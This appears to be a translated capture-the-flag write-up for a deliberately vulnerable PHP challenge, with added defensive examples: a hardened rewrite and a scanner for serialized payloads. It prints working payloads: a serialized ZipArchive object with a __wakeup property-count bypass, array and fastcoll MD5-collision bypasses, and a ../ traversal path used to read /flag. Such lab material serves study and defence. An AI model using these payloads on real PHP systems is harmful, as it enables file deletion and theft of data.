Open the challenge environment. The source it shows (the original, deliberately vulnerable challenge code, re-indented here with short comments marking the points the audit turns on):
<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;
    function __wakeup(){
        // runs on a normal unserialize() and resets $me; the chain depends on skipping it
        $this->me = new Ctf();
    }
    function __destruct() {
        // whatever object ends up in $me gets its open() called with attacker-chosen arguments
        $this->me->open($this->filename,$this->content);
    }
}
class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            // lock file missing or empty: reads the path held in the first 30 bytes of b
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?");
        }
    }
}
if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    // weak gate: a and b must differ while their md5() digests are identical
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }
}
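To make the defensive side concrete, here is an added example (not the challenge's source and not from the original post) of the same handler with each weakness the write-up goes on to use closed off. SANDBOX_DIR, the JSON request shape and all function names are assumptions of this example.

```php
<?php
// Added example, not the challenge's own code: the same request flow rewritten
// so that each step the write-up abuses is closed off. SANDBOX_DIR, the JSON
// request shape and the function names are assumptions made for this example.
declare(strict_types=1);

const SANDBOX_DIR = __DIR__ . '/sandbox';   // assumed sandbox location

// 1. Type-check parameters. In the original, a[]=1&b[]=2 makes both values
//    arrays: `!=` compares two different arrays, and md5() of an array is null
//    on PHP 7 (a TypeError on PHP 8), so `null === null` passes the gate.
function requireString(array $params, string $key): string
{
    if (!isset($params[$key]) || !is_string($params[$key])) {
        throw new InvalidArgumentException("parameter '$key' must be a string");
    }
    return $params[$key];
}

// 2. "a != b but md5(a) === md5(b)" is satisfiable by anyone with fastcoll,
//    because MD5 is not collision-resistant. Compare the inputs themselves in
//    constant time; if a digest is really needed, use SHA-256 or stronger.
function sameInput(string $a, string $b): bool
{
    return hash_equals($a, $b);
}

// 3. Confine reads to the sandbox. Only a bare file name is accepted (no
//    directory separators, no NUL bytes), it is resolved with realpath(), and
//    the result must still sit below the sandbox. This defeats ../ traversal
//    and the substr($_POST['b'], 0, 30) path trick alike.
function sandboxReadPath(string $name): string
{
    if ($name === '' || basename($name) !== $name || strpos($name, "\0") !== false) {
        throw new InvalidArgumentException('invalid file name');
    }
    $base = realpath(SANDBOX_DIR);
    $real = realpath(SANDBOX_DIR . '/' . $name);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('file is outside the sandbox');
    }
    return $real;
}

// 4. Never unserialize() attacker-controlled bytes: the serialized string picks
//    the classes that get instantiated (ZipArchive in this challenge) and thus
//    which __wakeup()/__destruct() run. Accept a plain data format instead and
//    construct your own object from it.
function parseRequest(string $json): array
{
    $data = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data) || !is_string($data['filename'] ?? null)
        || !is_string($data['content'] ?? null)) {
        throw new InvalidArgumentException('request must carry string filename and content');
    }
    return $data;
}

// 5. md5($filename . time()) is guessable to within a few seconds; stored
//    names that must stay unguessable come from a CSPRNG.
function storeInSandbox(string $content): string
{
    $name = bin2hex(random_bytes(16));
    file_put_contents(SANDBOX_DIR . '/' . $name, $content);
    return $name;
}

// Hardened equivalent of the original top-level flow: $post is $_POST,
// $body is the raw request body carrying the JSON document.
function handle(array $post, string $body): string
{
    $a = requireString($post, 'a');
    $b = requireString($post, 'b');
    if (!sameInput($a, $b)) {
        return 'mismatch';
    }
    $req = parseRequest($body);
    if (file_exists(SANDBOX_DIR . '/lock.lock')) {
        return storeInSandbox($req['content']);
    }
    $data = file_get_contents(sandboxReadPath($req['filename']));
    return $data === false ? 'read failed' : $data;
}
```

The fixes are independent: even if the MD5 gate stayed, refusing to unserialize() user input removes the whole property-chain, and confining paths with realpath() removes the file read regardless of how the gate is passed.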
The code is simple, so I won't say much; the key to this code audit is here:
function open($filename, $content){
    if(!file_get_contents("./sandbox/lock.lock")){
        echo file_get_contents(substr($_POST['b'],0,30));
        die();
    }else{
        file_put_contents("./sandbox/".md5($filename.time()),$content);
        die("or you can guess the final filename?");
    }
}
Step one: we need to bypass __wakeup.
Once inside open(), if the file ./sandbox/lock.lock exists we land in the else branch. Trying to access that file shows it does exist, so else it is.
The else branch clearly wants us to guess the file name,
but the name is passed through md5,
so guessing it is essentially impossible.
At this point we need the open() method of the built-in ZipArchive class to get rid of the lock file.
Example of deleting a file with the built-in ZipArchive class
Example of using PHP's ZipArchive class to manipulate files
You can read up on those.
So our payload here is:
<?php
class Jesen {
    public $filename = './sandbox/lock.lock';
    public $content = 8;          // 8 is ZipArchive::OVERWRITE, so open() truncates the file
    public $me;
}
$a = new Jesen();
$zip = new ZipArchive;
$a->me = $zip;
$b = serialize($a);
// declared property count 3 -> 4 so that __wakeup() is skipped on unserialize()
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";
Then POST it:
a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}
Here arrays are used to bypass the md5 comparison.
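As an added example that is not part of the original write-up, the following scanner shows how a defender can spot this payload before it ever reaches unserialize(): it parses the serialized string itself, so no magic method runs, and reports a declared property count that disagrees with the properties actually present (the __wakeup() bypass above) and any embedded object whose class is not on an allow-list (ZipArchive here). The class name SerializedPayloadScanner and its methods are made up for this example; the two sample strings are the payloads from this post.

```php
<?php
// Added example, not part of the original write-up: a scanner for PHP
// serialized strings that flags what the payload above relies on. It parses
// the format itself instead of calling unserialize(), so no __wakeup() or
// __destruct() can fire while checking. Names are invented for this example.
declare(strict_types=1);

final class SerializedPayloadScanner
{
    private string $s = '';
    private int $pos = 0;
    /** @var string[] */
    private array $findings = [];
    /** @var string[] */
    private array $allowedClasses;

    /** @param string[] $allowedClasses classes that may legitimately appear */
    public function __construct(array $allowedClasses) { $this->allowedClasses = $allowedClasses; }

    /** @return string[] findings; an empty list means nothing suspicious */
    public function scan(string $payload): array
    {
        $this->s = $payload; $this->pos = 0; $this->findings = [];
        $this->value();
        if ($this->pos !== strlen($this->s)) {
            $this->findings[] = "trailing data at offset {$this->pos}";
        }
        return $this->findings;
    }

    private function expect(string $lit): void
    {
        if (substr($this->s, $this->pos, strlen($lit)) !== $lit) {
            throw new InvalidArgumentException("expected '$lit' at offset {$this->pos}");
        }
        $this->pos += strlen($lit);
    }

    /** Reads up to (not including) $delim and skips past it. */
    private function readUntil(string $delim): string
    {
        $end = strpos($this->s, $delim, $this->pos);
        if ($end === false) {
            throw new InvalidArgumentException("missing '$delim' after offset {$this->pos}");
        }
        $out = substr($this->s, $this->pos, $end - $this->pos);
        $this->pos = $end + 1;
        return $out;
    }

    /** Parses key/value pairs up to the closing brace; returns how many were present. */
    private function members(): int
    {
        $n = 0;
        while (($this->s[$this->pos] ?? '}') !== '}') {
            $this->value();   // key
            $this->value();   // value
            $n++;
        }
        return $n;
    }

    private function value(): void
    {
        $type = $this->s[$this->pos] ?? '';
        switch ($type) {
            case 'N': $this->expect('N;'); return;
            case 'b': case 'i': case 'd':
                $this->pos += 2;                 // skip "i:" (or "b:", "d:")
                $this->readUntil(';');
                return;
            case 's':
                $this->pos += 2;
                $len = (int) $this->readUntil(':');
                $this->expect('"');
                $this->pos += $len;              // length-prefixed, so binary-safe
                $this->expect('";');
                return;
            case 'a':
                $this->pos += 2;
                $declared = (int) $this->readUntil(':');
                $this->expect('{'); $actual = $this->members(); $this->expect('}');
                if ($actual !== $declared) {
                    $this->findings[] = "array declares $declared elements but carries $actual";
                }
                return;
            case 'O':
                $this->pos += 2;
                $nameLen = (int) $this->readUntil(':');
                $this->expect('"');
                $class = substr($this->s, $this->pos, $nameLen);
                $this->pos += $nameLen;
                $this->expect('":');
                $declared = (int) $this->readUntil(':');
                if (!in_array($class, $this->allowedClasses, true)) {
                    $this->findings[] = "object of non-allow-listed class $class";
                }
                $this->expect('{'); $actual = $this->members(); $this->expect('}');
                if ($actual !== $declared) {
                    $this->findings[] = "$class declares $declared properties but carries $actual (__wakeup() bypass pattern)";
                }
                return;
            default:
                throw new InvalidArgumentException("unsupported type '$type' at offset {$this->pos}");
        }
    }
}

// Sample inputs: the benign Jesen object and the bypass payload from this post.
$scanner = new SerializedPayloadScanner(['Jesen']);
$samples = [
    'O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}',
    'O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";'
        . 'O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;'
        . 's:8:"filename";s:0:"";s:7:"comment";s:0:"";}}',
];
foreach ($samples as $p) {
    $f = $scanner->scan($p);
    echo $f === [] ? "clean\n" : "REJECT: " . implode('; ', $f) . "\n";
}
```

Run stand-alone, the first sample passes and the second is rejected for both the embedded ZipArchive object and the 4-versus-3 property count. This is a coarse filter for logging and blocking; the real fix remains not handing untrusted bytes to unserialize() at all, or at minimum calling it with ['allowed_classes' => false].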
Then access that file again: it no longer exists, so the bypass succeeded, and next this step will be executed:
echo file_get_contents(substr($_POST['b'],0,30));
Here we control b so that file_get_contents reads the flag.
The challenge also gave a hint: fastcoll, built-in class deserialization, flag at /flag.
So we use the fastcoll tool here.
fastcoll
Simply put, it generates two files that are not identical but have the same MD5 value.
So it can be used to give a and b values that pass the check.
Here b can be given a value like this:
./../../../../../../../../flag
A PHP stream wrapper should work too; everyone can try that, but doing it directly like this is the simplest.
This produced two files.
I still wasn't sure whether it had worked,
so I checked with a PHP script:
<?php
// read a file in binary mode so the collision blocks are not altered
function readmyfile($path){
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
echo md5(readmyfile("1.txt"));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5(readmyfile("2.txt"));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));
They are indeed identical,
so they can be URL-encoded directly:
<?php
// read a file in binary mode so the collision blocks are not altered
function readmyfile($path){
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
//echo md5(readmyfile("1.txt"));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5(readmyfile("2.txt"));
echo '============================';
echo urlencode(readmyfile("2.txt"));
.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3Co%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9CY%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%3B%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0N%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08%C1%DE%22%7F%99hE%AC%DA+%BD%A0%89-%60%BF%B2%5B%BE============================.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3C%EF%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9C%D9%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%BB%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0%CE%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08A%DE%22%7F%99hE%AC%DA+%BD%A0%89-%E0%BF%B2%5B%BE
Now that we have a and b, we still need the value of c:
<?php
class Jesen{
    public $filename;
    public $content;
    public $me;
}
$a = new Jesen();
echo serialize($a);
O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
Then POST the parameters and we get the flag:
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9B%EA%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BFm%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%7B%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%276%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s2%87I%DC%18%2F_I%22%F0%F3%CF%5D%05%9D%B2%0B%7DU&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9Bj%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BF%ED%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%FB%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%A76%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s%B2%86I%DC%18%2F_I%22%F0%F3%CF%5D%05%1D%B2%0B%7DU&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
I hope this article helps you!